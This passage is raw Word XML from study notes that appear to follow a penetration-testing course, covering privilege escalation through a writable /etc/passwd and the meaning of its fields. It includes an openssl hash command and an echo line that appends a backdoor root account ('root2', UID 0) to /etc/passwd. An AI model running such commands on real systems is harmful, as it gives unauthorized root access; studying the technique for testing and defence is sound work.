          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user record, it is considered valid for authentication and it takes precedence over the respective entry in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, if available. This means that if we can write into </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can effectively set an arbitrary password for any account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's demonstrate this. In a previous section, we showed that our Debian client may be vulnerable to privilege escalation because the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> permissions were not set correctly. To escalate our privileges, let's add another superuser (root2) and the corresponding password hash to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We will first generate the password hash using the</w:t>
      </w:r>
      <w:hyperlink r:id="rId1020">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1021">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">openssl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool and the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> argument. By default, if no other option is specified, openssl will generate a hash using the</w:t>
      </w:r>
      <w:hyperlink r:id="rId1022">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1023">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">crypt algorithm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a supported hashing mechanism for Linux authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output of the OpenSSL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command may vary depending on the system executing it. On older systems, it may default to the DES algorithm, while on some newer systems it could output the password in MD5 format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we have the generated hash, we will add a line to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the appropriate format:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2362200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10" name="image11.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image11.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1024"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943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2EA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl passwd w00t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" &gt;&gt; /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EAA">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in Listing 39, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user and the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">w00t</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> password hash in our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> record were followed by the user id (UID) zero and the group id (GID) zero. These zero values specify that the account we created is a superuser Linux account. Finally, in order to verify that our modifications were valid, we used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to switch our standard user to the newly created </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account, then issued the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to show that we indeed have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EAB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Even though finding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> world-writable might seem unlikely, many organizations implement hybrid integrations with third-party vendors that may compromise security for easier usability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EAC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E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AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jdblocgvkwbc" w:id="412"/>
      <w:bookmarkEnd w:id="412"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="609600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="308" name="image304.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image304.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1025"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="609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EB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For the last entry, apparently the "/" at the end of the hash password is not part of the hash, but it's part of /etc/passwd for organization, so ignore the slash at the end of hashed passwords stored in /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To look for valid users in /etc/passwd, just look for the word "bash" since only valid users will have access to /bin/bash. All the other junk will not have access to it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/passwd | grep bash </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EBC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd entry explained:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EBE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">joe:x:1000:1000:joe,,,:/home/joe:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EBF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login Name: "joe" - Indicates the username used for login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encrypted Password: "x" - This field typically contains the hashed version of the user's password. In this case, the value x means that the entire password hash is contained in the /etc/shadow file (more on that shortly).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UID: "1000" - Aside from the root user that has always a UID of 0, Linux starts counting regular user IDs from 1000. This value is also called real user ID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GID: "1000" - Represents the user's specific Group ID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comment: "joe,,," - This field generally contains a description about the user, often simply repeating username information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ECA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ECB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
